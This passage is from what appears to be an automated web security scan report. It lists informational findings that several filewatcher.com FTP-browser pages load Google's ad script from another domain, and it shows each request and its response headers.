ETag: "VUTr0W2gxfknmBFQfpdsEw"
Content-Length: 5907
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:00:46 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 542
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.fagskolen.gjovik.no/pub/Free
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.829. http://www.filewatcher.com/b/ftp/ftp.fagskolen.gjovik.no/pub/FreeBSD/releases/amd64/6.3-RELEASE/packages/All.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.fagskolen.gjovik.no/pub/FreeBSD/releases/amd64/6.3-RELEASE/packages/All.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.fagskolen.gjovik.no/pub/FreeBSD/releases/amd64/6.3-RELEASE/packages/All.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:00:46 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "Tkqmj4k8hBsHGhDx+fmzAw"
Content-Length: 50606
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:00:46 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 543
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.fagskolen.gjovik.no/pub/Free
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.830. http://www.filewatcher.com/b/ftp/ftp.fagskolen.gjovik.no/pub/FreeBSD/releases/amd64/7.0-RELEASE.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.fagskolen.gjovik.no/pub/FreeBSD/releases/amd64/7.0-RELEASE.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.fagskolen.gjovik.no/pub/FreeBSD/releases/amd64/7.0-RELEASE.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:00:44 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "t2wKH7QTZRUvJbmiL8suFg"
Content-Length: 13614
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:00:44 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 540
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.fagskolen.gjovik.no/pub/Free
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.831. http://www.filewatcher.com/b/ftp/ftp.fagskolen.gjovik.no/pub/FreeBSD/releases/amd64/7.0-RELEASE/packages.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.fagskolen.gjovik.no/pub/FreeBSD/releases/amd64/7.0-RELEASE/packages.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.fagskolen.gjovik.no/pub/FreeBSD/releases/amd64/7.0-RELEASE/packages.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:00:44 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "HQ9uxfb1S7ZzJqnBmNe8Pw"
Content-Length: 6158
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:00:44 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 540
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.fagskolen.gjovik.no/pub/Free
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.832. http://www.filewatcher.com/b/ftp/ftp.fagskolen.gjovik.no/pub/FreeBSD/releases/amd64/7.0-RELEASE/packages/All.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.fagskolen.gjovik.no/pub/FreeBSD/releases/amd64/7.0-RELEASE/packages/All.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.fagskolen.gjovik.no/pub/FreeBSD/releases/amd64/7.0-RELEASE/packages/All.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:00:44 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "UBEARS6yEQnl2m+51/CAPQ"
Content-Length: 51878
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:00:44 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 541
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.fagskolen.gjovik.no/pub/Free
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.833. http://www.filewatcher.com/b/ftp/ftp.fagskolen.gjovik.no/pub/OpenBSD.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.fagskolen.gjovik.no/pub/OpenBSD.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.fagskolen.gjovik.no/pub/OpenBSD.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:00:40 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "dbTzEc/iNSMHVkeRYuff5Q"
Content-Length: 7084
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:00:40 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 527
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.fagskolen.gjovik.no/pub/Open
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.834. http://www.filewatcher.com/b/ftp/ftp.fagskolen.gjovik.no/pub/OpenBSD/4.1.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.fagskolen.gjovik.no/pub/OpenBSD/4.1.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.fagskolen.gjovik.no/pub/OpenBSD/4.1.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:00:40 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "rjThj+PS21MFIVyzFxK2OA"
Content-Length: 11050
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:00:40 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 529
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.fagskolen.gjovik.no/pub/Open
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.835. http://www.filewatcher.com/b/ftp/ftp.fagskolen.gjovik.no/pub/OpenBSD/4.1/packages.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.fagskolen.gjovik.no/pub/OpenBSD/4.1/packages.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.fagskolen.gjovik.no/pub/OpenBSD/4.1/packages.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:00:40 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "Be9MxGJHFYwaJEJVBfzsxg"
Content-Length: 6109
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:00:40 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 534
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.fagskolen.gjovik.no/pub/Open
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.836. http://www.filewatcher.com/b/ftp/ftp.fagskolen.gjovik.no/pub/OpenBSD/4.1/packages/i386.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.fagskolen.gjovik.no/pub/OpenBSD/4.1/packages/i386.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.fagskolen.gjovik.no/pub/OpenBSD/4.1/packages/i386.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:00:41 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "kYqKtrPfE55qXRkj0S2mLw"
Content-Length: 35859
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:00:41 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 534
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.fagskolen.gjovik.no/pub/Open
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.837. http://www.filewatcher.com/b/ftp/ftp.fagskolen.gjovik.no/pub/OpenBSD/4.1/packages/sparc.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.fagskolen.gjovik.no/pub/OpenBSD/4.1/packages/sparc.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.fagskolen.gjovik.no/pub/OpenBSD/4.1/packages/sparc.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:00:42 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "ntyeDRfsWBTcZl4nZ9IF3Q"
Content-Length: 47669
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:00:42 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 536
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.fagskolen.gjovik.no/pub/Open
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.838. http://www.filewatcher.com/b/ftp/ftp.free.fr.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.free.fr.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.free.fr.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:47 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "jNFRt5G/WCzXrFDTU+nsyw"
Content-Length: 8401
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:47 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 659
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.free.fr/ - FTP Browser</titl
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.839. http://www.filewatcher.com/b/ftp/ftp.free.fr/.mirrors1.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.free.fr/.mirrors1.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.free.fr/.mirrors1.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:48 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "TBVGHZq0doRuMCfPipzMsQ"
Content-Length: 10083
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:48 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 661
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.free.fr/.mirrors1/ - FTP Bro
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.840. http://www.filewatcher.com/b/ftp/ftp.free.fr/.mirrors1/ftp.freebsd.org.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.free.fr/.mirrors1/ftp.freebsd.org.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.free.fr/.mirrors1/ftp.freebsd.org.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:48 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "iOYZtC69gIuS2hVIVmezLw"
Content-Length: 14149
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:48 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 664
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.free.fr/.mirrors1/ftp.freebs
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.841. http://www.filewatcher.com/b/ftp/ftp.free.fr/.mirrors1/ftp.freebsd.org/ports.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.free.fr/.mirrors1/ftp.freebsd.org/ports.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.free.fr/.mirrors1/ftp.freebsd.org/ports.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:49 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "bOf/qx5WQrlmOck7X4vvEQ"
Content-Length: 8419
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:49 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 666
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.free.fr/.mirrors1/ftp.freebs
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.842. http://www.filewatcher.com/b/ftp/ftp.free.fr/.mirrors1/ftp.freebsd.org/ports/sparc64.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.free.fr/.mirrors1/ftp.freebsd.org/ports/sparc64.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.free.fr/.mirrors1/ftp.freebsd.org/ports/sparc64.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:49 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "XrAza1K22KZ90FSXCy91lg"
Content-Length: 8884
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:49 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 666
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.free.fr/.mirrors1/ftp.freebs
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.843. http://www.filewatcher.com/b/ftp/ftp.free.fr/.mirrors1/ftp.freebsd.org/ports/sparc64/packages-7.0-release.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.free.fr/.mirrors1/ftp.freebsd.org/ports/sparc64/packages-7.0-release.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.free.fr/.mirrors1/ftp.freebsd.org/ports/sparc64/packages-7.0-release.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:50 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "mXgblmJpBdkJVXIOV3ERbg"
Content-Length: 26703
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:50 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 666
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.free.fr/.mirrors1/ftp.freebs
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.844. http://www.filewatcher.com/b/ftp/ftp.free.fr/.mirrors1/ftp.freebsd.org/ports/sparc64/packages-7.0-release/All.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.free.fr/.mirrors1/ftp.freebsd.org/ports/sparc64/packages-7.0-release/All.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.free.fr/.mirrors1/ftp.freebsd.org/ports/sparc64/packages-7.0-release/All.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:51 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "4azPs4bM40LsB81ShCAZ3Q"
Content-Length: 52151
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:51 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 666
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.free.fr/.mirrors1/ftp.freebs
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

